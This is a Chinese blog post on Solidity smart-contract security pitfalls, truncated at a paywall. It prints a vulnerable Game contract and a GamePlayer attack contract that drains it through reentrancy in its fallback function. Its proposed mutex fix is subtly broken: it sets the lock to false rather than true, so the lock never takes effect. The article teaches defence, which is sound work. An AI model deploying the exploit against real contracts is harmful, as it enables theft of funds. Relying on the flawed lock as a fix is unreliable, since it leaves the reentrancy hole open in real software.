智能合约安全陷阱和开发建议

最新推荐文章于 2024-08-03 00:19:55 发布
最新推荐文章于 2024-08-03 00:19:55 发布
阅读量3.1k 收藏 5
点赞数
分类专栏: solidity 文章标签: solidity
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/AdminZYM/article/details/95212838
版权
本文介绍了智能合约常见的安全陷阱,如函数可重入、跨函数资源共享、整数溢出、gas限制和循环等问题,并给出了相应的解决建议,如使用CEI模式、避免依赖时间戳、使用SafeMath库等。同时,文章强调了智能合约开发规范的重要性,包括错误处理、使用最新的安全规范和充分测试等。
摘要由CSDN通过智能技术生成

Solidity作为一种图灵完备的高级语言,可以支持逻辑比较复杂的智能合约的编写。一般情况下,Solidity开发者可以根据自己的意愿和预期开发一个智能合约项目。同时也不能保证,没有黑客攻击的存在。因此呢,确保安全性在Solidity开发中极为重要。

今天我们要介绍的常见智能合约安全陷阱包括如下:

  • 函数可重入
  • 跨函数资源共享
  • 整数溢出漏洞
  • gas限制和循环
  • tx.orign和msg.sender引发安全漏洞
  • 依赖时间戳漏洞
  • 利用revert发送dos攻击
  • 短地址攻击

智能合约安全陷阱举例

漏洞1:函数可重入

**可重入性:**函数被调用,没有执行完成,又一次被调用

示例:

pragma solidity ^0.5.0;

contract Game{
   
    //记录各个玩家余额
    mapping(address => uint256) private balance;
    
    constructor()payable public{
   
        
    }
    
    //玩家下注函数,向游戏合约充值
    function deposit()public payable{
   

        balance[msg.sender] += msg.value;
    }
    
    //玩家提款函数
    function withdraw()public{
   
        bool ret;
        bytes  memory data;
        
        uint256 amount = balance[msg.sender];
       
        (ret, data) = msg.sender.call.value(amount)("");
     
        if (ret){
   
            balance[msg.sender] = 0;
        }
    }
    //获取合约总余额函数
    function gameBalance() public view returns(uint256){
   
        return address(this).balance;
    }
}


contract GamePlayer{
   
    //记录游戏合约地址
    address payable target;
    
    constructor()payable public{
   
        
    }
    //攻击函数,外部账户调用这个合约对游戏合约进行攻击
    function attack(address payable addr) public{
   
       target = addr;
       
       Game g = Game(target);
       //先向合约充值1个以太币
       g.deposit.value(1000000000000000000)();
       //然后替换
       g.withdraw();
    }
    
    //fallback函数中进行重入提款
    function()payable external{
   
       Game g = Game(target);
       g.withdraw();
    }
    //查看玩家合约余额
    function palyerBalance() public view returns(uint256){
   
        return address(this).balance;
    }
}

从Game游戏合约中我们可以看出,它的withdraw函数有下面几方面的安全隐患:

-1. 使用了底层的call函数进行转账,同时没有指定gas消耗
-2. 提款操作时,没有将用户的余额状态变量清空,就向用户转账

由于游戏合约的withdraw函数,使用了call函数向玩家进行转账。call函数默认是将剩余的gas全部传入, 也就是说call函数默认允许使用全部剩余的gas。这样的话,如果call函数引发了重入的话,会执行很多代码,无法及时终止。另外withdraw函数是在call调用之后再将用户的余额的状态变量清空,如果call函数引发了重入再次调用withdraw函数,代码会判断用户余额状态,发现还能进行转账。

解决方法:

  • 对于第1点安全隐患的解决方案是使用send或者transfer函数进行转账,transfer函数只传入2300个gas,即便发生重入,也无法调用修改状态变量等操作,因为一个修改状态变量的操作所消耗的gas至少是5000。这样可以保证本次转账重入是安全的。
  • 对于第2点安全隐患的解决方案是使用CEI模式,全称是Checks-Effects-Interactions,先检查,再生效,最后交互,对于这个例子,游戏合约的withdraw函数应该先检查用户的状态变量是否是大于0,如果等于0就不用转账,如果是大于0的,将用户的状态余额先清空,最后进行进行转账。
  • 使用互斥锁对balance资源进行保护,如下:
pragma solidity ^0.5.0;
contract Game{
   
   mapping(address => uint256) private balance;
   bool balanceLock = false;
   
   constructor()payable public{
   
       
   }
   
   function deposit()public payable{
   

       balance[msg.sender] += msg.value;
   }
   
   function withdraw()public{
   
       require(!balanceLock);
       balanceLock = false;
       
       bool ret;
       bytes  memory data;
      
       uint256 amount = balance[msg.sender];
最低0.47元/天 解锁文章
AdminZYM
关注
专栏目录
应用于数字藏品的智能合约都有哪些安全风险?如何有效防范?
qq_32193015的博客
05-31 1453
国内数字藏品在技术上与NFT并无太大差别,也是通过智能合约来实现业务逻辑,所以合约漏洞等安全问题在国内数字藏品上也会存在,我们需谨慎对待。下面我们就来看看数字藏品在智能合约实现中存在的安全问题和解决方案。 数字藏品与智能合约 什么是智能合约? 为什么数字藏品的安全问题离不开对智能合约的讨论呢?因为,数字藏品在技术上是通过智能合约实现并运行的。在讨论数字藏品智能合约安全问题之前,我们先来看看什么是智能合约。 20世纪90年代,Nick Szabo首次提出智能合约的概念。当时,他把智能合...
区块链安全100问 | 第六篇:智能合约面临的安全风险
m0_37598434的博客
08-04 1952
​零时科技——专注于区块链安全领域 深圳零时科技有限公司(简称:零时科技),公司成立于2018年11月,是一家专注于区块链生态安全的实战创新型网络安全企业,团队扎根区块链安全与应用技术研究,以丰富的安全攻防实战经验结合人工智能数据分析处理,为用户提供区块链安全漏洞风险检测、安全审计、安全防御、资产追溯,以及企业级区块链应用创新解决方案。 零时科技区块链安全100问正式上线,以通俗易懂的语言形式为大家讲解区块链行业知识,以及区块链生态应用存在的安全问题,让更多人了解区块链及区块链安全。 前言
简单的智能合约开发
最新发布
linwq057的博客
08-03 1060
智能合约(Smart Contract)是一种旨在以信息化方式传播、验证或执行合同的计算机协议。它允许在没有第三方的情况下进行可信交易,这些交易可追踪且不可逆转。智能合约的概念最早由美国计算机科学家Nick Szabo于1994年提出,其设计初衷是在无需第三方介入的情况下,通过自动化的程序来执行合同条款。
智能合约安全(一):以太坊机制及安全问题
sinat_34996559的博客
12-23 1583
在本系列中,我们将对以太坊现有的安全问题和前沿的各类型漏洞挖掘方法进行综述。本文是本系列的第一篇文章,主要介绍以太坊的机制和存在的安全问题的分类。 01 什么是以太坊智能合约? 以太坊智能合约基于区块链(Blockchain)技术,作为一种旨在以信息化方式传播、验证或执行的计算机协议,为各类分布式应用服务提供了基础。简单来讲:如果把比特币看作是分布式的记账本;以太坊便是可以运行程序的分布式计算平台,程序运行的基础则是Solidity智能合约智能合约早在1995年就由尼克萨博提出,目的在于以数字形式定
智能合约最佳实践:智能合约安全最佳实践指南
02-05
智能合约安全性不仅关乎代码的正确性,还涉及到合约设计、部署和交互过程中的安全性。理解EVM(以太坊虚拟机)的工作原理和Solidity编程语言的基本语法是编写安全合约的前提。 2. **Solidity语言细节** ...
智能合约安全测试指南
chinadefi的博客
05-04 1911
智能合约安全测试指南 由于智能合约的漏洞,在去中心化应用的世界中,利用和攻击一直都很普遍,可以从各种来源看到,例如: https://rekt.news/ https://defiyield.app/rekt-database 与可以轻松打补丁的传统软件不同,大多数智能合约在部署后不能修改,允许在部署后修改智能合约的逻辑可能会为外部和内部参与者的攻击提供机会。因此,在智能合约开发中,安全性即使不是最重要的,也是优先项。 对于智能合约开发人员来说,知道如何安全地实现智能合约,并测试常见的陷阱和风险是
浅谈以太坊智能合约安全.pdf
08-24
安全运营是确保智能合约在整个生命周期内,从开发、部署到运行的每一个阶段都能保持安全的关键环节,包括代码审计、漏洞管理以及持续监控。 安全测试是检测智能合约潜在漏洞的重要手段。由于智能合约一旦部署,其...
Go-OpenZeppelin一个在Ethereum上构建安全智能合约的框架
08-14
总之,OpenZeppelin是Ethereum智能合约开发中的重要工具,它利用Go语言的强大功能,为开发者提供了一套安全可靠的合约模板,降低了开发复杂性和风险。通过深入学习和应用OpenZeppelin,开发者能够更专注于业务逻辑,...
智能合约与数据验证技术:保障区块链系统的安全与可靠性
程序员光剑
12-24 1241
1.背景介绍 区块链技术作为一种新兴的分布式数据存储和共享方式,具有很高的安全性和可靠性。然而,为了确保区块链系统的安全与可靠性,需要一些机制来保证数据的完整性和有效性。智能合约和数据验证技术就是这样一种机制,它们在区块链系统中扮演着关键的角色。 本文将从以下几个方面进行阐述: 背景介绍 核心概念与联系 核心算法原理和具体操作步骤以及数学模型公式详细讲解 具体代码实例和详细解释说明 未来发...
智能合约审计之DDOS概述
Fly_鹏程万里
07-16 1180
拒绝服务(DOS) 对智能合约进行DOS攻击的方法有很多种,其根本的目的是使合约在一段时间内或者永久无法正常运行,通过拒绝服务攻击,也可以使合约中的ether永远无法提取出来,下面将会列出几种常见的攻击场景: 未设定Gas费用的外部调用 在这种情况下,您可能希望对未知合同进行外部调用并继续处理事务,而不管该调用是否失败,通常通过call操作码来实现的,如果调用失败,调用操作码不会还原事务(有关更多详细信息和示例) 案例分析 下面我们考虑一个简单的例子,我们有一个钱包合约,当调用withdraw(.
solidity合约DOS攻击
qq_38935605的博客
04-20 4719
pragma solidity ^0.5.1; //业务逻辑,谁给的钱多我就记录谁,并且把上个人的钱退回去 contract longTest2{ address payable add; uint256 public code; function setAdd()public payable returns(uint256){ require(msg.value > code); require(add.send(code)); .
智能合约重构社会契约(6)赛迪智能合约安全标准
thefist的专栏
05-19 229
1. 安全实施框架 根据运行机制可分为运行与规划、合约创建、安全审计、合约触发、合约运行、合约废止六个阶段。 2. 编译部署安全要求 区块链系统应校验智能合约的编译实体、写入策略和签名内容。 区块链系统应将智能合约内容的哈希值写到区块链账本中。 区块链系统的共识机制安全可靠,才能保证智能合约安全。(必须使用拜占庭容错算法或其优化算法,并通过第三方验证) 3. 智能合约触发安全要求 3.1 直接接口调用安全要求 接口名称应明确接口功能,应具有可读性和可维护性; 直接接口调用应执行规定合约调用流程。
linux telnet qq邮箱,用telnet测试给qq邮箱发邮件,中途可能腾讯要你开启smtp服务器...
weixin_33246767的博客
05-15 2629
telnet smtp.qq.com220 smtp.qq.com Esmtp QQ Mail Serverhelo localhost//与qq服务器握手250 smtp.qq.comauth login334 VXNlcm5hbWU6OTkyMDE0NzE0QHFxLmNvbQ==//我的真实qq邮箱992014714@qq.com的base64编码为OTkyMDE0NzE0QHFxLmNvb...
基于区块链的智能合约安全
强子的专栏
09-12 5405
智能合约定义和实际应用举例 最近,区块链技术已经成为很多行业游戏规则的变革者,在比特币中涌现的分布式分类技术在数字货币之外也有了非常广阔的应用前景。 区块链技术最有前途的一个应用就是开发智能合约智能合约是自我执行合约,在智能合约中,合约条款由代码规定。基本上,这意味着可以用计算机程序编写具有法律效力的合约,而且这个合约可以自动执行。 至少在1996年Nick Szabo 就提出了这一概...
以太坊智能合约安全入门了解一下(下)
omnispace的博客
05-29 4479
作者:RickGray作者博客:http://rickgray.me/2018/05/26/ethereum-smart-contracts-vulnerabilities-review-part2/(注:本文分上/下两部分完成,上篇链接《以太坊智能合约安全入门了解一下(上)》) 接上篇3. Arithmetic Issues算数问题?通常来说,在编程语言里算数问题导致的漏洞最多的就是整数溢出了,...
智慧合约:智能合约安全问题的AI解决方案
weixin_34392435的博客
05-02 621
“一支穿云箭,千军万马来相见”。 在经历三个月“漫长熊市”后,从4月中旬开始,EOS的一个拉升,形成了数字货币市场大牛市的壮观景象。可是在美链BeautyChain(BEC)的智能合约漏洞被黑客利用、随意刷币,SmartMesh(SMT)智能合约再次爆出相同漏洞,并在OKex上出现大规模异常交易后,整个市场随即进入大幅震荡的情形。在了解事情经过后,我们不禁要问,为何小小的漏洞会引发如此大的动静?...
以太坊智能合约安全攻击数字调查研究
因此,作者建议开发智能合约时,需要对安全性进行充分的考虑,并使用妥协指标(IoC)对智能合约进行事后调查。 这篇论文对以太坊智能合约安全性进行了深入的研究,提出了使用妥协指标(IoC)对智能合约进行事后...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值